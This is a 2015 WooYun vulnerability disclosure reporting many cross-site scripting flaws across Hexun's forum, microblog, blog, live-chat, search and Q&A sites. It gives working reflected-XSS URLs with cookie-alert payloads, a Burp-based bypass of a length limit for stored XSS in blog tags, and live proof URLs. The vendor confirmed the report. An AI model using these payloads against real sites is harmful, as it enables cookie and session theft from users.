当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0107325

漏洞标题:和讯网一大批XSS跨站来袭

相关厂商:和讯网

漏洞作者: wy.

提交时间:2015-04-13 10:42

修复时间:2015-05-28 10:52

公开时间:2015-05-28 10:52

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:16

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-13: 细节已通知厂商并且等待厂商处理中
2015-04-13: 厂商已经确认,细节仅向厂商公开
2015-04-23: 细节向核心白帽子及相关领域专家公开
2015-05-03: 细节向普通白帽子公开
2015-05-13: 细节向实习白帽子公开
2015-05-28: 细节向公众公开

简要描述:

看到你给的rank一般都是15
就问你敢不敢给16

详细说明:

反射型的就太多了

和讯论坛
http://bbs.hexun.com/search/?bid=&q=xss</title><script>alert(document.cookie)</script>
和讯财经微博
1
http://t.hexun.com/k/topic.html?value=</title><script>alert(document.cookie)</script>
2
http://t.hexun.com/special/useriframe.aspx?userid=13650537&name="><img src=x onerror=alert(document.cookie)>//
和讯博客
http://blog.hexun.com/group/commontag.aspx?searchTag=xss"><script>alert(document.cookie)</script>
和讯直播平台
http://chat.hexun.com/RoomSearchResult.aspx?keystr=xss"><script>alert(document.cookie)</script>
和讯搜索
http://so.hexun.com/default.do 搜索"><script>alert(document.cookie)</script>


就不上图了 太多了 直接弹cookie
现在是存储型的了
和讯博客
http://blog.hexun.com 先注册个账号 然后去博客写文章

0x1.png


标签这里没有过滤喔 但是这里做了个长度限制

0x2.png


绕过?简单。
先用普通字符串"a"作为标记,然后打开burp进行截包 再修改为我们的xss代码

0x3.png


有效地址:http://26261042.blog.hexun.com/99121231_d.html(测试的时候插的)

0x6.png


和讯问答
http://wenda.hexun.com/
提问这块没有问题,问题在回答的时候。。。

0x7.png


呃。。这个。。。我真的没有忽悠你们 不信你们把鼠标移到回复那去。
有效地址:http://wenda.hexun.com/question/371963.html

漏洞证明:

如上

修复方案:

快修复

版权声明:转载请注明来源 wy.@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-04-13 10:50

厂商回复:

正在处理,非常感谢

最新状态:

暂无


漏洞评价:

评论